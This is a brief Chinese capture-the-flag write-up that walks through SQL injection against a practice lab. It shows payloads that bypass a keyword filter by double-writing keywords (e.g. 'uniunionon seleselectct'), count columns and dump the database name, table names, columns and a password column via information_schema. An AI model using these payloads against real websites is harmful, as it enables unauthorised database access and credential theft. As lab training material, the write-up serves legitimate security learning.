打开靶场
尝试用万能密码注入 1'or 1=1#
发现不能注入并且提示1前面的语句有问题
一步一步的尝试发现过滤了 or ,select, union 和","
构造payload:1’oorrder 1=1# 和1’oorrder 1=2#返回不一样 说明存在注入
判断字段数
1’oorrder by 3 时显示正常 1’oorrder by 4 提示我们字段数出了问题
说明只有3个字段
判断能显示的字段数
1' uniunionon seleselectct 1,2,3#
时返回2 和3说明第二第三字段能显示出来。
爆库
1' uniunionon seleselectct 1,2,database()#
得到库名geek
爆表
1' uunionnion seleselectct 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
得到两个表分别是b4bsql和geekuser
爆字段
1' uunionnion seleselectct 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
发现有三个表 查找其中的password表
1' uunionnion seleselectct 1,2,group_concat(passwoorrd) frfromom b4bsql#
获取flag